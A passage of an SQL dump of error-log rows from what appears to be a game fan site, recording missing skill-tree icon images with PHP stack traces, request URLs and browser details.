'2014-12-14 03:37:56', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_burningspirit.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 186, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (592, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_psychicscream.png\' found.', '14ec2310ee10e0e9b674bbad8b44fcf0682b5a6f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_ps...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_ps...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_psychicscream.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 116, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (593, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_siphomanmana.png\' found.', '651ba93104056d8e0e77002267f99a2202d5c5ae', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_si...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_si...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 00:43:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_siphomanmana.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (594, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_siphonmana.png\' found.', 'c0ec90eafd7b1e806d1339010efa0173c41fc461', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_si...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_si...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_siphonmana.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 249, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (595, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_blackplague.png\' found.', '0ad718e020d82786df46a84fbf051f34a901365b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_bl...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_bl...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_blackplague.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 33, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (596, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_impphaseshift.png\' found.', '3077e7b5cfb376d288b3ca175061f1c1b8329b2f', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_im...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_im...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_impphaseshift.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 108, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (597, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_unsommonbuilding.png\' found.', 'd47732dad6a933baeb6e31d65bacd471a13f2f3c', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_un...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_un...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 00:45:30', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_unsommonbuilding.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (598, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_unsummonbuilding.png\' found.', 'bc72bcbf2a33df7aba86f3c233de50b3e458a8f4', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_un...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_un...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.04, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_unsummonbuilding.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 84, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (599, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_improvedvampiricembrace.png\' found.', '13bbfcb2c80b924e52a6231bf13192f360acfd3a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_im...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_im...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.048, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_improvedvampiricembrace.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 25, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (600, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_shadowform.png\' found.', '524c9dffafd180e0cbe24cbbc3188d2a483e4c77', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_sh...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_sh...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_shadowform.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 21, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (601, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_wipsplode.png\' found.', '91918c8a948e68450d4c80b0b29f376e771cc139', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_wi...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_wi...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 00:48:16', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_wipsplode.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (602, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_fireball.png\' found.', '2f0990a348fed7848bb83c368de72939a96f6ef8', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_fire...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_fire...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:40:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_fire_fireball.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 203, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (603, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_spiritarmor.png\' found.', 'c90cc7ab9eaee1ecec0a09ea4f7ab7acc7b33bc3', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_sp...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_sp...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:40:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_spiritarmor.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 125, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (604, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_immolation.png\' found.', '383af70b6fb91769fd1f31cafa37ba9bbc217237', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_immo...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_immo...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:40:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_fire_immolation.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 173, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (605, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_frost_frostward.png\' found.', '3fa2b3e641deadcfe0afbbdbd5280928d5276fb5', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_fro...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_fro...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 03:40:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_frost_frostward.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 156, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (606, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_callstorm.png\' found.', '3190a664b6774cc2f7e8e95e6d1fa46ed8ef062d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_ca...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_ca...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:40:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_callstorm.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 117, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (607, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_sealoffire.png\' found.', '6d743a14857160f1452c3ddb4af23bbde8fa8766', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_seal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_seal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:40:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_fire_sealoffire.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 154, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (608, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_natur_eyeofthestorm.png\' found.', 'a68da34512d0ce4b83a421f9f936b28668b0eb34', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_natur_eye...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_natur_eye...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 00:52:54', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_natur_eyeofthestorm.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (609, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_eyeofthestorm.png\' found.', 'c46f71e21ead5436c6ed2fc3892dbfa7f222f7cb', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_ey...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_ey...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 03:40:43', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_eyeofthestorm.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 111, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (610, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_fire_elementaldevastation.png\' found.', 'bf3919d585cf3c24c265324c168054467492cbae', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_fire_elem...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_fire_elem...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.032, '2014-12-14 03:40:43', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_fire_elementaldevastation.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 109, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (611, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_stormreach.png\' found.', '80096742fa647514bc434a0e2d557621bcc2852d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_st...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_st...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): 